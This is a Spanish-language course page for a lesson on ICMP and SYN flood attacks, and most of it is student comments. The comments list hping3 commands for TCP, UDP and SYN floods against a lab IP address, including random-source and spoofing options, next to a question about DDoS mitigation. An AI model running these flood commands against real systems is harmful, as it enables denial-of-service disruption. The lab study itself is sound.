Aún no tienes acceso a esta clase

Crea una cuenta y continúa viendo este curso

Ataques ICMP y SYN Flood

24/33
Recursos

Aportes 6

Preguntas 1

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.

Ataques ICMP y SYN Flood


hping3 192.168.10.104 sólo envia paquetes en blanco sin ninguna bandera y recibe la bandera ACK

hping3 192.168.10.104 -T verifica los saltos en red
hping3 192.168.10.104 -p 80 -food hacer saturación en el puerto 80 con flood utilizando los recursos de la tarjeta de red (saturación para sobre cargar paquetes TCP de envió y respuesta)
hping3 --flood -udp -p 80 192.168.10.104 saturación de paquetes mediante UDP (El servidor no responde)
hping3 -S 192.168.10.104 --flood -p 80 se envian paquetes se SYN y se reciben paquetes de Solicitud y Confirmación (uso excesivo de recursos) -S es para sincronización de TCP
La estrategia para prevenir un ataque DoS es bloquear la IP cuando esta enviando demasiadas solicitudes
hping3 -S 192.168.10.104 --flood -p 80 --rand-source envia solicitudes con direcciones de origen aleatorias.

También se puede hacer un --spoof IP y usar el --faster.
Les recomiendo ir probando diferentes cosas, a partir de lo que vean en hping3 --help.

Pregunta::
Cuando sucede un ataque de DDoS, que se puede hacer para mitigar o frenar este tipo de ataque.

Cuando es un ataque por DoS normal , simplemente bloqueas la IP de origen. Pero en un DDoS que se puede hacer?

Hping3 es una aplicación de terminal para Linux que nos va a permitir analizar y ensamblar fácilmente paquetes TCP/IP.

Para saber la IP ya no se usa ifconfig se usa ip addr